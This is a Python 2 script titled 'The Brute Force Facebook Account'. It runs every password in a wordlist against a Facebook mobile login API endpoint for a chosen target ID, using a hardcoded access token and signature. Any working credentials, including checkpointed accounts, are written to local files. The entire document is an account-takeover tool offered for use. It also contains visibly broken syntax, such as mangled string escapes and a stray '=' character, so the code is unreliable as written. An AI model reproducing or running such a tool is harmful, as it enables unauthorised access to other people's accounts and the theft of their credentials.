import os, sys, time, datetime, random, json
from multiprocessing.pool import ThreadPool
try:
    import mechanize
except ImportError:
    os.system('pip2 install mechanize')
else:
    try:
        import requests
    except ImportError:
        os.system('pip2 install requests')

from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]

banner = '''

  ********
   **   **   
   **   **  ****  ***  ******  ***   ****
   **        **    *   **   *    *   **
   ******    **    *   **         * **
   **        **    *   **          **
   **        **    *   **         ** *
   **        **    *   **   *    **   *
  ****       *******   ******  ****   ***

#The Brute Force Facebook Account
#Copyright (c) 2020
#by DIKOY_VANESSA_ALAHOY
'''
ti = time.strftime("%X")
def spin():
   
  L="|/-\"
  for q in range(50):
    time.sleep(0.0999999)
    sys.stdout.write("\[#] Please Wait... "+L[q % len(L)]+" ")
    sys.stdout.flush()
spin()
def start():
        try:
            os.system('reset')
            print banner
            email = raw_input('[#] ID Target : ')
            passw = raw_input('[#] Wordlist : ')
            total = open(passw, 'r')
            total = total.readlines()
            spin()
            print '\\-------------------------------\[#] Starting at [' + ti+']'
            print '[#] ID Target : ' + email
            print '[#] Wordlist  : ' + str(len(total))
            print '-------------------------------'
            time.sleep(1.0)
            print
            sandi = open(passw, 'r')
            for pw in sandi:
                try:
                    pw = pw.replace('\', '')
                    print('[#] Cracking...'+pw)
                    data = requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + email + '&locale=en_US&password=' + pw + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
                    mpsh = json.loads(data.text)
                    if 'access_token' in mpsh:
                        dapat = open('succes.txt', 'w')
                        dapat.write('[ID]=> ' + email + '\')
                        dapat.write('[PW]=> ' + pw)
                        dapat.close()
                        print '[#] Succes !!'
                        print '[#] ID : '+email
                        print '[#] Pass :'+pw
                        print '[#] Status SUCCES'
                        print '[#] Program Finish'
                        sys.exit()
                    else:
                        if 'www.facebook.com' in mpsh['error_msg']:
                            ceks = open('succesCP.txt', 'w')
                            ceks.write('[ID]=> ' + email + '\')
                            ceks.write('[PW]=> ' + pw)
                            =ceks.close()
                            print '[#] Succes !!!'
                            print '[#] ID   : '+email
                            print '[#] Pass : '+pw
                            print '[#] Status : Checkpoint '
                            print '[#] Program Finish'
                            sys.exit()
                except requests.exceptions.ConnectionError:
                    print '[!] Falied !! Please Check Your Connecktion '
                    print '[!] Connection TIMED_OUT'
                    print '[!] Program Closed '
                    sys.exit()

        except IOError:
            print
            print '[!] The Wordlist Not Found !!!'
            print '[!] Program Closed '
            sys.exit()
start()